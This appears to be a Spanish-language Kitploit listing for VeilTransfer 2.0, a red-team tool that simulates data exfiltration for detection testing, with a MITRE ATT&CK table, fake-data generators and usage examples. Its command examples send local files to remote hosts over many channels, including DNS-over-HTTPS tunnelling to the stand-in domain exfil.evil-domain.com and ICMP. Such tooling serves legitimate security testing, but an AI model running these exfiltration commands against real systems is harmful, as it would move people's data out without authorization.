Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
VeilTransfer — VeilTransfer is a data exfiltration utility designed to test and enhance the detection capabilities. This tool simulates real-world data exfiltration techniques used by advanced threat actors, allowing organizations to evaluate and improve their security posture. | Kitploit
Herramientas/GitHubGitHub/infosecn1nja/veiltransfer
Data ExfiltrationNetwork SecurityPenetration TestingRed Teaming
GitHubinfosecn1nja/veiltransfer

VeilTransfer

VeilTransfer is a data exfiltration utility designed to test and enhance the detection capabilities. This tool simulates real-world data exfiltration techniques used by advanced threat actors, allowing organizations to evaluate and improve their security posture.

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
15722hace 7 mesesRevisado por Kitploit

VeilTransfer 2.0

VeilTransfer es una utilidad de exfiltración de datos diseñada para probar y mejorar las capacidades de detección. Esta herramienta simula técnicas reales de exfiltración de datos utilizadas por actores de amenazas avanzados, lo que permite a las organizaciones evaluar y mejorar su postura de seguridad. Al aprovechar múltiples métodos de exfiltración como MEGA, GitHub, SFTP, WebDAV y más, VeilTransfer ayuda a identificar brechas en sus defensas y garantiza que sus soluciones de seguridad estén preparadas para contrarrestar las filtraciones de datos modernas.

Métodos de exfiltración compatibles

  • MEGA
  • GitHub
  • Dropbox
  • Telegram
  • Pastebin
  • WebDAV
  • Webhook
  • SFTP
  • FTP
  • DoH (DNS sobre HTTPS)
  • QUIC
  • ICMP

Mapeo MITRE ATT&CK

IDTécnicas
T1029Scheduled Transfer
T1020Automated Exfiltration
T1132.001Data Encoding: Standard Encoding
T1560.002Archive Collected Data: Archive via Library
T1567.001Exfiltration Over Web Service: Exfiltration to Code Repository
T1567.002Exfiltration Over Web Service: Exfiltration to Cloud Storage
T1567.003Exfiltration Over Web Service: Exfiltration to Text Storage
T1567.004Exfiltration Over Web Service: Exfiltration Over Webhook
T1048.003Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
T1048.002Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Características adicionales

Generación de datos falsos

VeilTransfer también admite generar datos falsos, incluidos:

  • Números de tarjeta de identidad de Indonesia (KTP): Genera números de KTP realistas y datos asociados.
  • Información de tarjetas de crédito: Crea detalles falsos de tarjetas de crédito en formato PCI DSS, incluidos nombre, apellido, CCN (Visa/MasterCard/AMEX) y fecha de vencimiento.
  • Números de Seguro Social (SSN): Genera SSN falsos para usar en simulaciones y entornos de prueba.
  • Registros médicos: Genera datos falsos de registros médicos en indonesio (id) o inglés (en).

Creación de archivos Zip

Crea fácilmente archivos zip para agrupar y comprimir datos, que luego pueden usarse para exfiltración o para probar diferentes escenarios. Admite la división opcional en varios archivos según el tamaño.

Ejemplos de uso

  • Operaciones de Red Team: Implementa VeilTransfer durante ejercicios de Red Team para desafiar a los Blue Teams con escenarios de exfiltración sofisticados y realistas.
  • Purple Teaming: Colabora con tus equipos de defensa para simular y luego detectar intentos de exfiltración, refinando tanto las tácticas ofensivas como las defensivas.
  • Pruebas de seguridad: Usa VeilTransfer para validar la eficacia de DLP, NDR, cortafuegos y otras medidas de seguridad de red.

Ejemplo de uso

Transferencia

Transferir un archivo a través de SFTP

Este ejemplo demuestra cómo transferir un archivo de forma segura a un servidor remoto mediante el protocolo SFTP. El archivo se encuentra en la máquina local y se transfiere al directorio remoto especificado mediante autenticación SSH.

root@kitploit:~
veiltransfer_client transfer sftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server example.com:22 -username user -password pass

Transferir archivos a un servidor WebDAV

En este ejemplo, los archivos de un directorio local se cargan en un servidor WebDAV. El servidor requiere un nombre de usuario y una contraseña para la autenticación. El parámetro del servidor incluye el esquema de URI (https:// o http://).

root@kitploit:~
veiltransfer_client transfer webdav -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server http://webdav.example.com:8080 -username user -password pass

Transferir archivos a Mega Cloud

Este ejemplo muestra cómo transferir archivos al almacenamiento de Mega Cloud. Los archivos se cargan desde un directorio local especificado, y la autenticación se maneja con las credenciales de Mega Cloud del usuario.

root@kitploit:~
veiltransfer_client transfer mega -localPath (/path/to/file or /path/to/directory) -username [email protected] -password megasecretpassword

Transferir archivos mediante FTP

En este ejemplo, se carga un archivo a un servidor FTP. El archivo se transfiere a un directorio específico en el servidor remoto. El servidor requiere un nombre de usuario y una contraseña para la autenticación.

root@kitploit:~
veiltransfer_client transfer ftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server ftp.example.com:21 -username ftpuser -password ftppassword

Subir un archivo a Pastebin

Este ejemplo demuestra cómo subir el contenido de un archivo a Pastebin. El contenido se publica en Pastebin utilizando una clave API proporcionada por el usuario.

root@kitploit:~
veiltransfer_client transfer pastebin -localPath (/path/to/file or /path/to/directory) -apiKey your_pastebin_api_key

Enviar un archivo a un repositorio de GitHub

Este ejemplo muestra cómo enviar un archivo desde la máquina local a un repositorio específico de GitHub. El archivo se agrega al repositorio utilizando el token de API de GitHub del usuario para la autenticación.

root@kitploit:~
veiltransfer_client transfer github -localPath (/path/to/file or /path/to/directory) -repo yourusername/repository -apiKey your_github_api_token

Enviar un archivo a un canal de Telegram

Este ejemplo demuestra cómo enviar un archivo a un canal específico de Telegram. El archivo se envía utilizando un token de API de bot de Telegram, y el mensaje se entrega al ID de canal especificado.

root@kitploit:~
veiltransfer_client transfer telegram -localPath (/path/to/file or /path/to/directory) -telegramAPI your_telegram_bot_api_token -channelID 123456789

Enviar datos a una URL de Webhook

En este ejemplo, el contenido de un archivo se envía a una URL de Webhook especificada.

root@kitploit:~
veiltransfer_client transfer webhook -localPath (/path/to/file or /path/to/directory) -webhookURL https://webhook.site/your-webhook-url

Transferir archivos mediante DoH (DNS sobre HTTPS)

Para establecer un mecanismo seguro de exfiltración de datos mediante DNS sobre HTTPS (DoH), se deben configurar los siguientes registros DNS:

  1. Registro A: Apunta test a la dirección IP <VeilTransfer_IP_Address>.

    test -> <VeilTransfer_IP_Address>

  2. Registro NS: Define un subdominio (exfil) que esté gestionado por evil-domain.com.

    exfil -> test.evil-domain.com

El dominio exfil.evil-domain.com servirá como dominio DNS Exfil.

A continuación, inicia el servidor VeilTransfer en modo DoH con el siguiente comando:

root@kitploit:~
veiltransfer_server doh -key ag36rjsg284nfk2g -folder /root/data/exfil

Nota: La clave de cifrado (-key) debe tener una longitud de 16 o 32 caracteres.

Para subir archivos mediante DoH, asegúrate de que el servidor VeilTransfer esté ejecutándose activamente en modo DoH con una clave de cifrado válida. Luego, inicia la transferencia con el comando del cliente:

root@kitploit:~
veiltransfer_client transfer doh -localPath /path/to/file_or_directory -key ag36rjsg284nfk2g -dnsServer exfil.evil-domain.com

Transferir archivos mediante QUIC

Para iniciar el servidor VeilTransfer en modo QUIC, usa el siguiente comando:

root@kitploit:~
veiltransfer_server quic -cert /path/server.crt -key /path/server.key

Una vez que el servidor esté en ejecución, puedes subir archivos o directorios usando:

root@kitploit:~
veiltransfer_client transfer quic -localPath (/path/to/file or /path/to/directory) -server example.com:443

Transferir archivos mediante ICMP

Para habilitar transferencias de archivos mediante el protocolo ICMP, inicia el servidor VeilTransfer en modo ICMP ejecutando el siguiente comando:

root@kitploit:~
veiltransfer_server_linux icmp -folder /path/folder

Una vez que el servidor esté activo, ejecuta el siguiente comando para transferir archivos o directorios mediante ICMP:

root@kitploit:~
veiltransfer_client_linux transfer icmp -localPath (/path/to/file or /path/to/directory) -server <ip address>

Crear archivos Zip

Crear un archivo Zip simple

Crea un archivo zip a partir de un directorio especificado.

root@kitploit:~
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip

Crear un archivo Zip dividido

Crea un archivo zip dividido en varias partes según el tamaño especificado.

root@kitploit:~
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip -splitSize 1000000

Generador de datos

Generar 100 números de tarjeta de crédito falsos

Este ejemplo muestra cómo generar 100 entradas de datos falsos de tarjetas de crédito. Los datos generados incluirán números de tarjeta de crédito, fechas de vencimiento y detalles asociados.

root@kitploit:~
veiltransfer_client generate-fake -ccn -count 100

Generar 50 entradas KTP de Indonesia falsas

Este ejemplo demuestra cómo generar 50 entradas de datos KTP falsos, que son tarjetas de identidad de Indonesia. Los datos incluyen información personal como nombre, dirección y número de KTP.

root@kitploit:~
veiltransfer_client generate-fake -ktp -count 50

Generar 200 números de Seguro Social falsos

Los datos generados incluyen números de Seguro Social con el formato estándar de EE. UU.

root@kitploit:~
veiltransfer_client generate-fake -ssn -count 200

Generar 300 registros médicos falsos en inglés

Este ejemplo demuestra cómo generar 300 registros médicos falsos en inglés.

root@kitploit:~
veiltransfer_client generate-fake -medical-record -count 300 -language en

Contribuciones

¡Las contribuciones a VeilTransfer son bienvenidas! Si tienes ideas para nuevas funciones, métodos de exfiltración o mejoras, por favor envía un pull request o abre un issue en GitHub.

Descargar herramienta